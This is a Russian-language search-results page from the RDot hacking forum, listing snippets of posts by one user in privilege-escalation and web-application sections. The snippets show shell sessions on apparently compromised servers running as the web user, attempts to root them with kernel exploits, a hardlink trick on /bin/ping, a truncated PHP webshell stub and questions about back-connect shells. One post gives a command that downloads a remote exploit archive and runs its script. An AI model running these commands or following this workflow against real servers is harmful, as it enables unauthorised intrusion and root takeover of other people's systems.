Вернуться   RDot > Поиск по форуму

Показано с 1 по 25 из 29.
На поиск затрачено 0.00 сек.
Поиск: Сообщения от: mythtrandyr
Раздел: Повышение привилегий/Privilege escalation 03.09.2014, 11:18
Ответов: 1,219
Просмотров: 666,421
Автор mythtrandyr
Linux 3.2.13-xxxx-std-ipv6-64 #1 SMP Wed Mar 28...

Linux 3.2.13-xxxx-std-ipv6-64 #1 SMP Wed Mar 28 11:20:17 UTC 2012 x86_64
На сервере есть файл(Это весь код файла):

<?php
if (isset($_REQUEST['pwd']) && sha1($_REQUEST['pwd']) ===...
Раздел: Повышение привилегий/Privilege escalation 24.01.2012, 21:03
Ответов: 15
Просмотров: 17,503
Автор mythtrandyr
Если у кого-то есть возможность, выложите...

Если у кого-то есть возможность, выложите пожалуйста бинарник, скомпилиный на убунте x64...
пробовал компилить на x86...в результате, при запуске на x64, получил:

chmod +x a
./a
a: 1: Syntax...
Раздел: Повышение привилегий/Privilege escalation 27.10.2011, 19:38
Ответов: 55
Просмотров: 54,463
Автор mythtrandyr
Попался сервер: Linux *** 2.6.36-gentoo-r5 ...

Попался сервер: Linux *** 2.6.36-gentoo-r5
попробовал стандартным методом порутать и вот что получилось:

sh-4.1$ mkdir /tmp/exploit
mkdir /tmp/exploit
sh-4.1$ ln /bin/ping /tmp/exploit/target...
Раздел: Повышение привилегий/Privilege escalation 14.10.2011, 16:07
Ответов: 55
Просмотров: 54,463
Автор mythtrandyr
нет. Только Linux

нет. Только Linux
Раздел: Повышение привилегий/Privilege escalation 26.09.2011, 15:55
Ответов: 1,219
Просмотров: 666,421
Автор mythtrandyr
разве можно его юзать через либу...

разве можно его юзать через либу "/lib/libc-2.7.so" ?*?
Раздел: Web-среда/Web-applications 15.09.2011, 22:37
Ответов: 3,618
Просмотров: 2,143,066
Автор mythtrandyr
нет. Да, это он...

нет.



Да, это он...
Раздел: Web-среда/Web-applications 15.09.2011, 17:40
Ответов: 3,618
Просмотров: 2,143,066
Автор mythtrandyr
подскажите пожалуйста, реально ли сделать...

подскажите пожалуйста, реально ли сделать бекконект на сервере, где выключенны:
Disabled PHP Functions: dl, shell_exec, exec, system, passthru, popen, proc_open, proc_nice, proc_get_status,...
Раздел: Повышение привилегий/Privilege escalation 31.08.2011, 14:34
Ответов: 55
Просмотров: 54,463
Автор mythtrandyr
Этот способ просто альтернатива, для систем в...

Этот способ просто альтернатива, для систем в которых нету libcprofile.so....а не как обход патча этой уязвимости!

А систему которую он пробил, с датой 2011год. он пробил только потому что он её...
Раздел: Повышение привилегий/Privilege escalation 31.07.2011, 16:41
Ответов: 15
Просмотров: 14,918
Автор mythtrandyr
Не выполняет..что с флагом -m32 что без, реакции...

Не выполняет..что с флагом -m32 что без, реакции ноль...пробовал ради интереса другие сплойты...не один не выполнился...такую ощущение что сервер вообще не реанирует на команду ./sploit .
Раздел: Повышение привилегий/Privilege escalation 31.07.2011, 11:54
Ответов: 15
Просмотров: 14,918
Автор mythtrandyr
400 - Invalid hash parameter 2 SynQ, ...

400 - Invalid hash parameter

2 SynQ,
Есть сервер: Linux 2.6.18-194.11.3.el5 #1 SMP Mon Aug 30 16:19:16 EDT 2010 x86_64, по ядру видно что уязвимо к асид битчес сплойту...но при запуске ничего...
Раздел: Повышение привилегий/Privilege escalation 30.07.2011, 18:44
Ответов: 8
Просмотров: 5,579
Автор mythtrandyr
cпасибо

cпасибо
Раздел: Повышение привилегий/Privilege escalation 30.07.2011, 03:24
Ответов: 8
Просмотров: 5,579
Автор mythtrandyr
Вариант повышения привелегий

Есть сервер с шелом, у шела права владельца папки сайта...делаю бекконект и соответственно получаю такие же права как и у шела. После чего ввожу команду: ssh-keygen -t rsa -b 2048 , добавляю...
Раздел: Повышение привилегий/Privilege escalation 29.07.2011, 18:10
Ответов: 15
Просмотров: 14,918
Автор mythtrandyr
Было бы замечательно, если бы можно было увидеть...

Было бы замечательно, если бы можно было увидеть модифицырованый вариант сплойта...т.к. многим поданная модификация не по силам...
Раздел: Повышение привилегий/Privilege escalation 06.06.2011, 23:09
Ответов: 66
Просмотров: 45,306
Автор mythtrandyr
FreeBSD 8.0-RELEASE #0: Tue Jun 22 15:40:10 MSD...

FreeBSD 8.0-RELEASE #0: Tue Jun 22 15:40:10 MSD 2010
Раздел: Повышение привилегий/Privilege escalation 04.06.2011, 13:54
Ответов: 66
Просмотров: 45,306
Автор mythtrandyr
сплойт с 14 поста этой темы обязательно запускать...

сплойт с 14 поста этой темы обязательно запускать с папки /tmp
всё работает с одного терминала...
Раздел: Повышение привилегий/Privilege escalation 04.06.2011, 07:09
Ответов: 66
Просмотров: 45,306
Автор mythtrandyr
Первый пост читал ? второе окно терминала...

Первый пост читал ? второе окно терминала надо....в нём как бы рутом становишся...
Раздел: Повышение привилегий/Privilege escalation 02.06.2011, 11:21
Ответов: 1,219
Просмотров: 666,421
Автор mythtrandyr
sh: no job control in this shell sh-3.2$ uname...

sh: no job control in this shell
sh-3.2$ uname -a;id;
Linux azrael.echoditto.com 2.6.18-194.11.4.el5 #1 SMP Tue Sep 21 05:04:09 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
uid=48(apache)...
Раздел: Повышение привилегий/Privilege escalation 25.05.2011, 16:28
Ответов: 26
Просмотров: 21,333
Автор mythtrandyr
сплойт с первого сообщения этой темы.

сплойт с первого сообщения этой темы.
Раздел: Повышение привилегий/Privilege escalation 23.05.2011, 02:09
Ответов: 26
Просмотров: 21,333
Автор mythtrandyr
sh: no job control in this shell sh-3.2$ cd...

sh: no job control in this shell
sh-3.2$ cd /tmp
sh-3.2$ uname -a
Linux site.com 2.6.34.6-xxxx-std-ipv6-64 #3 SMP Fri Sep 17 16:19:12 UTC 2010 x86_64 GNU/Linux
sh-3.2$ gcc a.c
sh-3.2$ ./a.out...
Раздел: Повышение привилегий/Privilege escalation 19.05.2011, 00:47
Ответов: 1,219
Просмотров: 666,421
Автор mythtrandyr
Подскажите пожалуйста, чем можно пробить вот это:...

Подскажите пожалуйста, чем можно пробить вот это:
Linux 2.6.18-128.7.1.el5 #1 SMP Wed Aug 19 04:00:44 EDT 2009 i686

enlightenment не взял...(
Раздел: Повышение привилегий/Privilege escalation 12.05.2011, 15:24
Ответов: 1,219
Просмотров: 666,421
Автор mythtrandyr
Попробуй вот так: wget...

Попробуй вот так:

wget http://grsecurity.net/~spender/therebel.tgz
tar -zxf therebel.tgz
cd therebel
./therebel.sh
Раздел: Повышение привилегий/Privilege escalation 07.05.2011, 11:31
Ответов: 27
Просмотров: 13,542
Автор mythtrandyr
FreeBSD 4.8-STABLE #1: Tue May 6 15:01:09 MSD...

FreeBSD 4.8-STABLE #1: Tue May 6 15:01:09 MSD 2008

ls -al /libexec
total 4
drwxr-xr-x 2 0 wheel 512 Jul 6 2004 .
drwxr-xr-x 18 0 wheel 512 Jun 15 2007 ..

Это можно чем-то пробить ?
Раздел: Повышение привилегий/Privilege escalation 02.05.2011, 14:33
Ответов: 3
Просмотров: 3,860
Автор mythtrandyr
неужели под такого древнего зверя нет ничего...

неужели под такого древнего зверя нет ничего рабочего ?:)
Раздел: Повышение привилегий/Privilege escalation 30.04.2011, 19:04
Ответов: 1,219
Просмотров: 666,421
Автор mythtrandyr
Действительно помогло ) стрёмный админ попался на...

Действительно помогло ) стрёмный админ попался на /tmp поставил noexec а на папку upload своего сайта(единственную открытую на запись папку) не поставил )

Спасибо за подсказку :)
Раздел: Повышение привилегий/Privilege escalation 30.04.2011, 18:16
Ответов: 1,219
Просмотров: 666,421
Автор mythtrandyr
Linux 2.6.18-53.el5 #1 SMP Wed Oct 10 16:34:19...

Linux 2.6.18-53.el5 #1 SMP Wed Oct 10 16:34:19 EDT 2007 x86_64

Disabled PHP Functions: none
Userful: gcc, cc, ld, make, php, perl, python, tar, gzip, bzip2, nc, locate
Danger: clamd, iptables,...
Показано с 1 по 25 из 29.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot